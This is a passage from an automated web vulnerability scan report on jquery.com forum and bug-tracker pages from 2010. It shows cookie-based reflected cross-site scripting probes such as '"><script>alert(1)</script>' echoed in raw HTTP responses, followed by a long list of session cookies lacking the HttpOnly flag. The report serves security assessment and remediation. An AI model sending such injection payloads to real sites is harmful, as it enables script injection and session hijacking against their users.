This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6F0ACDD3561A068936408D33E591266D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:34 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb6c604"><script>alert(1)</script>054deb72aea"/>
...[SNIP]...

1.286. http://forum.jquery.com/user/wycats [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f07ad"-alert(1)-"d8cb1ced23d was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbf07ad"-alert(1)-"d8cb1ced23d;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=65F748435D03AB0128EDDDB5A5F0DDF7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:49 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbf07ad"-alert(1)-"d8cb1ced23d";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.287. http://forum.jquery.com/user/wycats [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e8a"><script>alert(1)</script>584a7ed4c4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=878EA3BDF0049AC830DD8D9F91AE07FB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:26 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb51e8a"><script>alert(1)</script>584a7ed4c4"/>
...[SNIP]...

1.288. http://forum.jquery.com/using-jquery [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/using-jquery

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de5"><script>alert(1)</script>07af53c395e was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /using-jquery HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbb0de5"><script>alert(1)</script>07af53c395e;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:21:56 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbb0de5"><script>alert(1)</script>07af53c395e"/>
...[SNIP]...

2. Cookie without HttpOnly flag set previous next
There are 34 instances of this issue:

http://bugs.jquery.com/newticket
http://forum.jquery.com/about-the-jquery-forum
http://forum.jquery.com/about-the-jquery-forum/feed
http://forum.jquery.com/developing-jquery-core/feed
http://forum.jquery.com/developing-jquery-mobile
http://forum.jquery.com/developing-jquery-mobile/feed
http://forum.jquery.com/developing-jquery-plugins
http://forum.jquery.com/developing-jquery-plugins/feed
http://forum.jquery.com/developing-jquery-ui/feed
http://forum.jquery.com/jquery-conferences
http://forum.jquery.com/jquery-conferences/feed
http://forum.jquery.com/jquery-mobile
http://forum.jquery.com/jquery-mobile/feed
http://forum.jquery.com/jsp/i18nConstants.jsp
http://forum.jquery.com/qunit-and-testing
http://forum.jquery.com/qunit-and-testing/feed
http://forum.jquery.com/sendFeedback.do
http://forum.jquery.com/subscribeRegister.do
http://forum.jquery.com/topic/how-can-i-help-9-5-2010
http://forum.jquery.com/topic/looking-for-help-on-panel-development
http://forum.jquery.com/uploadImage.do
http://forum.jquery.com/user/andrew_powell
http://forum.jquery.com/user/charlietfl
http://forum.jquery.com/user/christophe
http://forum.jquery.com/user/jeresig
http://forum.jquery.com/user/kbwood.au
http://forum.jquery.com/user/scottjehl
http://forum.jquery.com/user/wycats
http://forum.jquery.com/using-jquery-plugins/feed
http://forum.jquery.com/using-jquery-ui/feed
http://forum.jquery.com/using-jquery/feed
http://meetups.jquery.com/main/badge/showPlayerConfig
http://plugins.jquery.com/
http://b.scorecardresearch.com/b

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

2.1. http://bugs.jquery.com/newticket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bugs.jquery.com
Path:	/newticket

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trac_form_token=fb447b3831e75a8e953d1043; Path=/
trac_session=7449c302e08b5599f25f977d; expires=Mon, 14-Feb-2011 02:34:39 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newticket HTTP/1.1
Host: bugs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: trac_session=ef3b3632c1eb2698d8a6210a; trac_form_token=92628968b66cfc1a686b73e2; __utmz=119074714.1289873044.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=119074714.56097933.1289873044.1289873044.1289873044.1; __utmc=119074714; __utmb=119074714.1.10.1289873044;

Response

HTTP/1.1 200 Ok
Server: nginx/0.7.65
Date: Tue, 16 Nov 2010 02:34:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: must-revalidate
Content-Length: 12043
Set-Cookie: trac_form_token=fb447b3831e75a8e953d1043; Path=/
Set-Cookie: trac_session=7449c302e08b5599f25f977d; expires=Mon, 14-Feb-2011 02:34:39 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">



<h
...[SNIP]...

2.2. http://forum.jquery.com/about-the-jquery-forum previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.3. http://forum.jquery.com/about-the-jquery-forum/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=873A51D3AEF828D67511A5ECABECAF02; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about-the-jquery-forum/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=873A51D3AEF828D67511A5ECABECAF02; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:57 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.4. http://forum.jquery.com/developing-jquery-core/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-core/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=6C3C3DACDDB447B425357999305AC82B; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-core/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6C3C3DACDDB447B425357999305AC82B; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:55 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.5. http://forum.jquery.com/developing-jquery-mobile previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BE61E18B27FEA85612DE309D854DEEBD; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.6. http://forum.jquery.com/developing-jquery-mobile/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

2.7. http://forum.jquery.com/developing-jquery-plugins previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=31A3A3697572135978EA43A4B3445CA3; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.8. http://forum.jquery.com/developing-jquery-plugins/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BA6932EA2617342EA339D66B2AF60194; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-plugins/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BA6932EA2617342EA339D66B2AF60194; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:59 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.9. http://forum.jquery.com/developing-jquery-ui/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/developing-jquery-ui/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E31E96CCF256172436993DEA1F835E6B; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-ui/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E31E96CCF256172436993DEA1F835E6B; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:25 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.10. http://forum.jquery.com/jquery-conferences previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E9EAA61A3D158993FEA0827C700963BF; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.11. http://forum.jquery.com/jquery-conferences/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/jquery-conferences/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=40FF9D5D8C2F7ABAE6ABFBC5F54B4EDD; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-conferences/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=40FF9D5D8C2F7ABAE6ABFBC5F54B4EDD; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:29 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.12. http://forum.jquery.com/jquery-mobile previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=146CD0CCDD0B8E3BD799AAF98F5C892D; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.13. http://forum.jquery.com/jquery-mobile/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/jquery-mobile/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=8695160D9955B3EC9559107E265FC5FC; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8695160D9955B3EC9559107E265FC5FC; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.14. http://forum.jquery.com/jsp/i18nConstants.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/jsp/i18nConstants.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E1E47BDD097BA4D9D3A2A85F540B8999; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/i18nConstants.jsp HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=DC8A5909B0D933EC59A3C84884479B5E; __utmz=44433727.1289873270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.119885522.1289873270.1289873270.1289873270.1; __utmc=44433727; __utmb=44433727.2.10.1289873270; zdccn=d6441e45-f0c8-4f7a-8a60-69a4d49095ae;

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E1E47BDD097BA4D9D3A2A85F540B8999; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:39 GMT
Server: Apache-Coyote/1.1
Connection: close

2.15. http://forum.jquery.com/qunit-and-testing previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E5466414448844E9BCAEB960C7DE0267; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.16. http://forum.jquery.com/qunit-and-testing/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/qunit-and-testing/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BB93452B50B14E4513ACB35739034DED; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /qunit-and-testing/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BB93452B50B14E4513ACB35739034DED; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:30 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.17. http://forum.jquery.com/sendFeedback.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/sendFeedback.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A6EDE9A48A2F661EC4A127FE0509A508; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sendFeedback.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 500 POST_ONLY_URL
Set-Cookie: JSESSIONID=A6EDE9A48A2F661EC4A127FE0509A508; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 16 Nov 2010 02:34:38 GMT
Server: Apache-Coyote/1.1
Connection: close

<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
<div class="headerAre
...[SNIP]...

2.18. http://forum.jquery.com/subscribeRegister.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/subscribeRegister.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=50010F8418F40C3040264512D399D885; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribeRegister.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=50010F8418F40C3040264512D399D885; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:34 GMT
Server: Apache-Coyote/1.1
Connection: close

2.19. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=ECE9699A2EDA73BBD1A86295BA681CEC; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.20. http://forum.jquery.com/topic/looking-for-help-on-panel-development previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=824525F306F33D1A660A41D747B3C3C5; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.21. http://forum.jquery.com/uploadImage.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/uploadImage.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=DD4C43763F4EDFA92007DB02C656454B; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uploadImage.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
